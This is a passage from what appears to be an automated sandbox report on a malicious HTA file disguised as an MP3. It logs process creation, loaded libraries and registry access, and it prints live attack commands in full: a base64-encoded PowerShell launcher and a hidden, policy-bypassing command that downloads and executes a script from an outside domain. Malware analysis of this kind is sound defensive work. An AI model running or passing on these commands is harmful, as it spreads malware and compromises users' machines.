              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041866310_2_00418663
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00411E6B10_2_00411E6B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040760010_2_00407600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00404E1010_2_00404E10
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042F63F10_2_0042F63F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004226C010_2_004226C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00436EC010_2_00436EC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004096F010_2_004096F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042E6F810_2_0042E6F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004296FF10_2_004296FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040B6AE10_2_0040B6AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041DF5010_2_0041DF50
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041CF6010_2_0041CF60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00441F6010_2_00441F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00425F7010_2_00425F70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042AF7A10_2_0042AF7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042A71E10_2_0042A71E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402F2010_2_00402F20
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041173710_2_00411737
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00405FF010_2_00405FF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041A7A010_2_0041A7A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043F7A910_2_0043F7A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00414380 appears 121 times
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00408140 appears 48 times
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
              Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.evad.winHTA@10/6@12/4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004323FD CoCreateInstance,10_2_004323FD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c0fpwi2x.ag5.ps1Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\rii2.mp3.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AaAAyAC4AZQByAHIAYQBuAHQAcgBlAGYAcgBhAGkAbgB1AG4AZABvAGMAawBlAGQALgBzAGgAbwBwAC8AcgBpAGkAMgAuAGYAaQBsAGUAJwApACkAYAAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAEgAaQBkAGQAZQBuAA==Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))" Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://h2.errantrefrainundocked.shop/rii2.file'))"
